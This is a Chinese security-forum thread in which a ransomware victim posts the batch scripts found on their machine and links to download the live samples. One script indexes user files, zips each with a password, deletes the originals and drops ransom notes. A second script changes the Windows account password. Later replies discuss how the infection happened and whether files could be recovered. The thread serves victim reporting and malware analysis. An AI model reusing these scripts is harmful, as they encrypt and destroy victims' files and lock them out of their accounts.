吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3954|回复: 12
收起左侧

【勒索病毒】早晨开机发现密码错了,再查发现多了一个System32用户,再查发现勒索病毒

[复制链接]
s1711880582 发表于 2022-4-4 13:14
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
今天早晨开机密码不对了,再查发现多了一个System32用户,进PE改密码进系统,在360杀毒的时候,再查发现勒索病毒的文件,360未报毒,关机进Ubuntu查看文件,只加密了几个文件(貌似),还在搜索。
在我的Users/THHICV/Videos/Windows01目录下有:

C.bat  D.bat  E.bat  F.bat  README_WARNING.TXT  update.exe
C.txt  D.txt  E.txt  F.txt  exclude.txt 


C.bat貌似是用来生成索引文件的:
dir /b /s /a-d "C:\" 2>nul| findstr /ilv /c:"%ProgramFiles%" /c:"%windir%" /c:"%serprofile%\appdata" /c:"%ProgramData%" >C.txt

setlocal enabledelayedexpansion
set key=%1
set start="update.exe"
set fl=C.txt

for /f "delims=" %%i in (%fl%) do (
  for /f "delims=" %%j in ("%%i") do (
    %start% a -p%key% -inul -y -m0 -k -mt64 -ibck -ep -afzip -df -x@exclude.txt "%%~dpj\%%~nxj.[u%itwsgmjnerbqiy%n%wwegbxiyutaux%l%ejvo%o%xfkqbjoucu%c%fdnnbcm%k%lacsxihatqaleu%e%cndivspiz%r%vgpwll%@%yzdol%o%eizmrqt%n%qnhjvqacbrxw%i%ktvruxt%o%ekzuoqli%n%knsvcjnnxjkmjg%m%qkdvadmmnmbc%a%fqcptoco%i%uwjmlauycgvxh%l%bointflz%.%intwoyc%o%wbdxvxsxtnvv%r%ssgzd%g%ckauaeaslpysje%].id[%key:~-5%].lock" "%%i"
  )
)

for /r "C:\Users" %%f in (.) do (
    copy "README_WARNING.TXT" "%%~ff" > nul
)

DEL C.txt

del %0
exit


C.txt每一行就是一个文件。

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| s1711880582 发表于 2022-4-4 13:16
[Shell] 纯文本查看 复制代码
以下是改密码的文件
net user %username% GKZCeSvuW2sD
taskkill /f /im wscript.exe
timeout /t 2
start window.vbs
exit
 楼主| s1711880582 发表于 2022-4-7 14:00
shojnhv 发表于 2022-4-5 08:53
楼主一看就是技术帝,想知道你最近做了什么动作,浏览了什么网站等,才中招的,学习一下,避免也中招

不知道怎么中招的,头一天安装了一个wireshark,github找了几个python的爬虫跑了下,没有其他操作
 楼主| s1711880582 发表于 2022-4-4 13:27
病毒样本:https://wwm.lanzout.com/iQjt702lap3c
病毒样本:https://wwm.lanzout.com/iCdpz02lap2b

文件被加密为 多模态烟火监测系统.docx.[unlocker@onionmail.org].id[LdpBv].lock
shojnhv 发表于 2022-4-5 08:53
楼主一看就是技术帝,想知道你最近做了什么动作,浏览了什么网站等,才中招的,学习一下,避免也中招
flyjerry 发表于 2022-4-5 13:52
有点困难
chenhui1986 发表于 2022-4-7 22:29
学习了,感谢分享
handianduo 发表于 2022-4-23 18:19
请问楼主恢复文件了没?我昨天中招,症状几乎完全一样。。。
 楼主| s1711880582 发表于 2022-4-26 15:05
handianduo 发表于 2022-4-23 18:19
请问楼主恢复文件了没?我昨天中招,症状几乎完全一样。。。

未恢复,发现的及时,只加密了我回收站的8W个数据集文件和2个WORD文档,我直接删了,沙雕病毒
junjun1802 发表于 2022-7-25 14:56
s1711880582 发表于 2022-4-26 15:05
未恢复,发现的及时,只加密了我回收站的8W个数据集文件和2个WORD文档,我直接删了,沙雕病毒

linux有啥安全措施吗?
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:10

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表